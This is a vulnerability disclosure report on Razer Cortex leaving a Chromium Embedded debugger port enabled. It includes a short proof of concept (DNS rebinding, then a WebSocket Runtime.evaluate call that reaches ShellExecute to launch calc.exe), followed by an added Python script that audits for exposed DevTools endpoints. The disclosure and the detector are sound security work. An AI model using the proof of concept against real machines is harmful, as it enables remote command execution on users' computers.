Razer "Cortex" has CEF debugger stub enabled by default allowing arbitrary remote command execution

I was alerted on twitter that the software distributed by Razer for their gaming equipment might be unsafe, so I downloaded the ones I could see online to take a look. I have only looked at "Cortex", apparently some kind of system optimizer (frankly, the claims it makes seem dubious).

Cortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds.

    $ curl -si localhost:8088/json/list
    HTTP/1.1 200 OK
    Content-Length:2094
    Content-Type:application/json; charset=UTF-8

    [ {
       "description": "",
       "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)",
       "id": "(A6E5587C41694A59DB4142D98362B4CA)",
       "title": "Razer Game Deals - The best game deals on the web",
       "type": "page",
       "url": "https://deals.razer.com/?From=cortex&Userid=...",
       "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)"
    } ]

That is obviously exploitable, but the mechanics are pretty tricky. Razer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method JSOutBrowser.open(), which passes its argument directly to ShellExecute(), so it can be used for command execution.

1. Read the list of pages using DNS rebinding from http://localhost:8088/json/list
2. Open a WebSocket to the webSocketDebuggerUrl listed. Do something like:

    x = new WebSocket("ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)")
    x.send(JSON.stringify({"id":1,"method":"Runtime.enable"})) // Enable javascript evaluation
    x.send(JSON.stringify({"id":2,"method":"Runtime.evaluate","params":{"expression":"RazerCortexOutBrowser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))"}})) // Run arbitrary commands.

This bug is subject to a 90 day disclosure deadline.
After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by: taviso
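The root cause above is a Chromium/CEF remote-debugging listener left on in a shipped build, and the quickest way for a defender or auditor to find such a listener on a machine is the same /json/list request the report uses: a real DevTools endpoint answers with a JSON array whose entries carry a webSocketDebuggerUrl, and any such entry is a page whose JavaScript context an attacker could drive. The following script is an added example written for this page, not code from the report or from Razer: it parses a /json/list body into the scriptable targets, probes a local port for one, and prints an audit line. The port 8088 is the one the report observed; the function and variable names are the author's own, and the embedded sample is a constructed copy of the response shape shown above.

```python
"""Audit helper: detect a CEF/Chromium DevTools remote-debugging endpoint on a
local port and list the pages it would let a client script.

Added example for this page, not part of the original report. Port 8088 is the
one the report observed for Cortex; any port can be passed."""
import json
import urllib.error
import urllib.request

DEFAULT_PORT = 8088

# Constructed sample: a copy of the /json/list response shape shown in the report.
SAMPLE_JSON_LIST = """[ {
   "description": "",
   "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)",
   "id": "(A6E5587C41694A59DB4142D98362B4CA)",
   "title": "Razer Game Deals - The best game deals on the web",
   "type": "page",
   "url": "https://deals.razer.com/?From=cortex&Userid=...",
   "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)"
} ]"""


def parse_debug_targets(body):
    """Parse a /json/list body and return the targets a DevTools client could attach to.

    Only entries that expose a webSocketDebuggerUrl count: without that endpoint
    there is no Runtime.evaluate channel. Raises ValueError if the body is not a
    JSON array, so a random web service on the port is not mistaken for DevTools."""
    data = json.loads(body)
    if not isinstance(data, list):
        raise ValueError("expected a JSON array from /json/list")
    targets = []
    for entry in data:
        if not isinstance(entry, dict):
            continue
        ws = entry.get("webSocketDebuggerUrl")
        if not ws:
            continue
        targets.append({
            "id": entry.get("id", ""),
            "type": entry.get("type", ""),
            "title": entry.get("title", ""),
            "url": entry.get("url", ""),
            "ws": ws,
        })
    return targets


def probe_devtools(host="localhost", port=DEFAULT_PORT, timeout=2.0):
    """Request /json/list from host:port. Returns (exposed, targets).

    exposed is False when nothing answers, the connection fails, or the reply
    does not have the DevTools listing shape."""
    url = f"http://{host}:{port}/json/list"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return False, []
    try:
        return True, parse_debug_targets(body)
    except ValueError:
        return False, []


def render_report(exposed, targets, host="localhost", port=DEFAULT_PORT):
    """Build the audit text: one header line plus one line per scriptable page."""
    if not exposed:
        return f"{host}:{port}: no DevTools endpoint answered (ok)"
    lines = [f"{host}:{port}: DevTools remote debugging is EXPOSED; "
             f"{len(targets)} scriptable target(s)"]
    for t in targets:
        lines.append(f"  [{t['type']}] {t['title']!r} url={t['url']} ws={t['ws']}")
    return "\n".join(lines)


if __name__ == "__main__":
    exposed, targets = probe_devtools()
    print(render_report(exposed, targets))
```

Run it on the host under review; a line reading EXPOSED with at least one target means the application has shipped with the CEF remote-debugging port enabled, and the fix belongs in the build (CEF's remote_debugging_port setting left at its default of off for release builds) rather than in a firewall rule, since the report's DNS-rebinding step shows a loopback-only listener is still reachable from a web page.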